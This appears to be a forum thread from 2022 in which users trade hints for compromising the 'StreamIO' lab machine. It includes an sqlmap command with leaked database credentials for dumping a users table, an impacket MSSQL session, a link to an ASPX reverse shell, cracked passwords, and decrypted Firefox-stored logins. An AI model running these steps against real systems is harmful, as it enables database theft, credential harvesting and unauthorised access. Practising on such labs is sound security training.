(June 5, 2022, 02:25 PM) karhu Wrote:
(June 5, 2022, 02:01 PM) Exa Wrote:
Forwarding port 1433, there is a streamio_backup database.
So, I saw that port 1433 was open on the DC, but when I try to log in with yoshihide or db_user, I get nothing. Maybe I'm missing something obvious, idk.
You need db_admin not db_user for streamio_backup database.
Find the creds in index.php, forward port, do
sqlmap -d mssql://db_admin:'B1@hx31234567890'@localhost:1433/streamio_backup --dump -D users
to dump users table. Crack the hash to get nikk37 and connect with winrm.

(June 5, 2022, 02:31 PM) loge23 Wrote:
(June 5, 2022, 02:25 PM) karhu Wrote:
(June 5, 2022, 02:01 PM) Exa Wrote:
Forwarding port 1433, there is a streamio_backup database.
So, I saw that port 1433 was open on the DC, but when I try to log in with yoshihide or db_user, I get nothing. Maybe I'm missing something obvious, idk.
You need db_admin not db_user for streamio_backup database.
Find the creds in index.php, forward port, do
sqlmap -d mssql://db_admin:'B1@hx31234567890'@localhost:1433/streamio_backup --dump -D users
to dump users table. Crack the hash to get nikk37 and connect with winrm.
I can't believe I missed db_admin in index.php. :dodgy: Thanks!

Someone is saying that we can use the yoshihide user for privilege escalation (for administrator).
He gave me this hint, saying that it is an unintended way to do it with the web user yoshihide:
Aspx + iis gives you more Hint aspx is different You can make one
I didn't get what he wants to say. I used https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx. This aspx shell didn't give me Administrator; it gave me the same yoshihide user shell.

Hey, I'm working on privesc, I was wondering if slack.streamio.htb was unreachable for everyone or if it was just me.

(June 5, 2022, 06:05 PM) jon01 Wrote:
(June 5, 2022, 02:31 PM) loge23 Wrote:
(June 5, 2022, 02:25 PM) karhu Wrote:
(June 5, 2022, 02:01 PM) Exa Wrote:
Forwarding port 1433, there is a streamio_backup database.
So, I saw that port 1433 was open on the DC, but when I try to log in with yoshihide or db_user, I get nothing. Maybe I'm missing something obvious, idk.
You need db_admin not db_user for streamio_backup database.
Find the creds in index.php, forward port, do
sqlmap -d mssql://db_admin:'B1@hx31234567890'@localhost:1433/streamio_backup --dump -D users
to dump users table. Crack the hash to get nikk37 and connect with winrm.
It's giving me an error.
I used this script: https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py

(June 4, 2022, 09:04 PM) dude4695 Wrote:
user = yoshihide pass = '66boysandgirls..'
How to crack the hash to that pass? I tried rockyou, bruteforce and online services.

(June 5, 2022, 06:34 PM) Peter Wrote:
(June 4, 2022, 09:04 PM) dude4695 Wrote:
user = yoshihide pass = '66boysandgirls..'
How to crack the hash to that pass? I tried rockyou, bruteforce and online services.
https://crackstation.net/

(June 5, 2022, 06:51 PM) jon01 Wrote:
(June 5, 2022, 06:40 PM) Exa Wrote:
(June 5, 2022, 06:34 PM) Peter Wrote:
(June 4, 2022, 09:04 PM) dude4695 Wrote:
user = yoshihide pass = '66boysandgirls..'
How to crack the hash to that pass? I tried rockyou, bruteforce and online services.
https://crackstation.net/
Can you tell me how you did that via impacket, because I am not getting the nikk hash by dumping users?
python mssqlclient.py 'db_admin:#########'@127.0.0.1 -port 1433
then
use streamio_backup;
select * from users;

Is there any way to dump the database quicker? The time-based one in the login page is taking forever.

https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
crack C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db